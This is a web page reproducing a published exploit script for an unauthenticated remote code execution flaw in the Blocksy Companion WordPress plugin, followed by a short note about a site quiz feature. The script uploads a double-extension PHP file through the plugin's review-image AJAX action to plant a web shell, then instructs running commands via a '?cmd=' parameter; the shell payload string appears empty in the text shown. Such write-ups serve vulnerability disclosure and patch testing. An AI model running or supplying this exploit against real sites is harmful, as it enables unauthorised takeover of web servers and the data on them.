threat_intelligence297 wordsRead on Arc Codex

[webapps] Blocksy Companion 2.1.46

#!/usr/bin/env python3 # Exploit Title: Blocksy Companion 2.1.46 - RCE # CVE: CVE-2026-58480 # Date: 2026-07-13 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://creativethemes.com # Software Link: https://wordpress.org/plugins/blocksy-companion/ # Affected: Blocksy Companion <= 2.1.46 (Pro with Advanced Reviews + Custom Fonts) # Tested on: WordPress + Blocksy Companion 2.1.46 # Category: WebApps # Platform: PHP # Exploit Type: Remote Code Execution (Unauthenticated) # CVSS: 9.8 (Critical) # Description: Unauthenticated arbitrary file upload via blc-review-images[] parameter in save_attachments. # Double-extension bypass (.woff2.php) due to strpos() check in Custom Fonts extension. # Fixed in: 2.1.47 # Usage: # python3 exploit.py # # Examples: # python3 exploit.py http://target.com # # Notes: # β€’ Requires Advanced Reviews and Custom Fonts extensions enabled. # β€’ Uploaded shell lands in wp-content/uploads/ (check response for exact path). # # How to Use # # Step 1: # Run the script with target URL. # # Step 2: # Use the generated shell URL with ?cmd=command (e.g. ?cmd=id) import requests import sys def banner(): print(r""" β•”β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•— β•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘ β•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— β•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β•β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β• ╔═╗ Banyamer Security ╔═╗ """) if len(sys.argv) < 2: banner() print("Usage: python3 exploit.py ") sys.exit(1) banner() target = sys.argv[1].rstrip('/') shell_name = "poc.woff2.php" payload = """ """ files = { 'blc-review-images[]': (shell_name, payload, 'application/octet-stream') } data = { 'action': 'blc_save_review_attachments' } print("[+] Sending unauthenticated file upload...") try: r = requests.post(f"{target}/wp-admin/admin-ajax.php", files=files, data=data, timeout=15) print(f"Status: {r.status_code}") print(r.text[:600]) print("\n[+] If successful, check wp-content/uploads/ for the shell.") print(f"[+] Example: {target}/wp-content/uploads/YEAR/MONTH/{shell_name}?cmd=id") except Exception as e: print(f"[-] Error: {e}")

How it works

Once you click Generate, Ollama reads this article and crafts 5 comprehension questions. Your answers are graded against the article content β€” general knowledge won't be enough. Score 70+ to count toward your certificate.

Questions are cached β€” you'll always get the same 5 for this article.